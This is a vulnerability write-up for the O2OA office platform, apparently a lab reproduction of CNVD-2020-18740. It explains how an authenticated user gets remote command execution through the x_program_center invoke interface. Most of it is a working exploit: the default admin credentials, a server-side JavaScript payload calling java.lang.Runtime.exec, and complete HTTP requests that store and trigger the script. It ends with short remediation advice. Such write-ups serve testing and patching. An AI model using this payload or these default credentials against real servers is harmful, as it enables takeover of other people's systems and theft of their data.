Vulnerability Overview
O2OA is an open-source, free enterprise and team office platform built around four sub-platforms: portal management, process management, information management, and data management. It bundles work reporting, project collaboration, mobile OA, document sharing, process approval, and data collaboration to cover a range of enterprise management and collaboration needs. The `invoke` interface of the x_program_center service lets a logged-in user store a server-side JavaScript snippet as an "interface configuration" and then call it. Because that script is evaluated inside the JVM with unrestricted access to Java classes such as java.lang.Runtime, an attacker who can authenticate (for example with the default xadmin account) can execute arbitrary operating-system commands on the server.
Scope of Impact
Fingerprint: web page title "O2OA"
CNVD ID: CNVD-2020-18740
Exploitation Process
Pull the image and start the container with Docker (the run command must reference the image that was pulled):
docker pull oxnme/o2oa:6.1.3
docker run --name o2server -p 80:80 -p 20010:20010 -p 20020:20020 -p 20030:20030 -d oxnme/o2oa:6.1.3
Default (weak) credentials: xadmin/o2 on older releases, xadmin/o2oa@2022 on newer ones.
Once the container is up, open the web port you mapped in a browser (the environment in this write-up uses 8001); it redirects to the O2OA login page:
http://192.168.31.151:8001/x_desktop/index.html
Log in with the default account xadmin/o2.
Note: on newer O2OA versions the default password is xadmin/o2oa@2022 instead.
In the admin console, open Service Management.
Add a new interface configuration.
Paste the following script as the interface body. It runs on the server's JVM, spawns `id` through java.lang.Runtime, collects stdout line by line, and returns the lines as the JSON response body:
// Run the OS command and wrap its stdout in a line reader
var bufReader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("id").getInputStream()));
var result = [];
// readLine() returns null at end of stream; stop there instead of pushing the null
while (true) {
var oneline = bufReader.readLine();
if (oneline == null) break;
result.push(oneline);
}
// Return the captured output as the HTTP response body
this.response.setBody({ "Result": result }, "application/json");
The same interface configuration can be created without the UI by sending the following request. The Authorization header carries the session token of the logged-in user, and the body is the JSON form of the configuration, with the script in the "text" field:
The request package is as follows:
POST /x_program_center/jaxrs/invoke?v=6.3 HTTP/1.1
Host: 192.168.31.151:20030
Authorization: PfyuxmzgIzrrkjVKSmRBJ4uCkH5tYmpq50QnO7mEHhA
Content-Type: application/json

{"id":"cmd","name":"cmd","enableToken":false,"alias":"","description":"","validated":true,"enable":true,"text":"var bufReader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(\"id\").getInputStream()));\n\nvar result = [];\nwhile (true) {\n var oneline = bufReader.readLine();\n result.push(oneline);\n if (!oneline) break;\n}\nvar result = { \"Result\": result };\nthis.response.setBody(result, \"application/json\"); ","remoteAddrRegex":"","createTime":"2022-08-27 04:39:18","updateTime":"2022-08-27 04:39:18"}
Then trigger the stored script by calling the interface's execute endpoint (the interface id, here `cmd`, is part of the path):
The request package is as follows:
POST /x_program_center/jaxrs/invoke/cmd/execute HTTP/1.1
Host: 192.168.31.151:20030
Authorization: PfyuxmzgIzrrkjVKSmRBJ4uCkH5tYmpq50QnO7mEHhA
Content-Type: application/json

{"id":"cmd","name":"cmd","enableToken":false,"alias":"","description":"","validated":true,"enable":true,"text":"var bufReader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(\"id\").getInputStream()));\n\nvar result = [];\nwhile (true) {\n var oneline = bufReader.readLine();\n result.push(oneline);\n if (!oneline) break;\n}\nvar result = { \"Result\": result };\nthis.response.setBody(result, \"application/json\"); ","remoteAddrRegex":"","createTime":"2022-08-27 04:39:18","updateTime":"2022-08-27 04:39:18"}
Because the command is hard-coded inside the stored script, every different command needs its own interface configuration (a new id and a new "text" body) before it can be executed.
Recommended Fixes
Upgrade O2OA to a version in which this issue is fixed.
Change the default xadmin password immediately after installation; the exploit above only needs a valid login.
Do not expose the x_program_center service (port 20030 in this setup) to untrusted networks, and restrict who may create interface configurations in Service Management.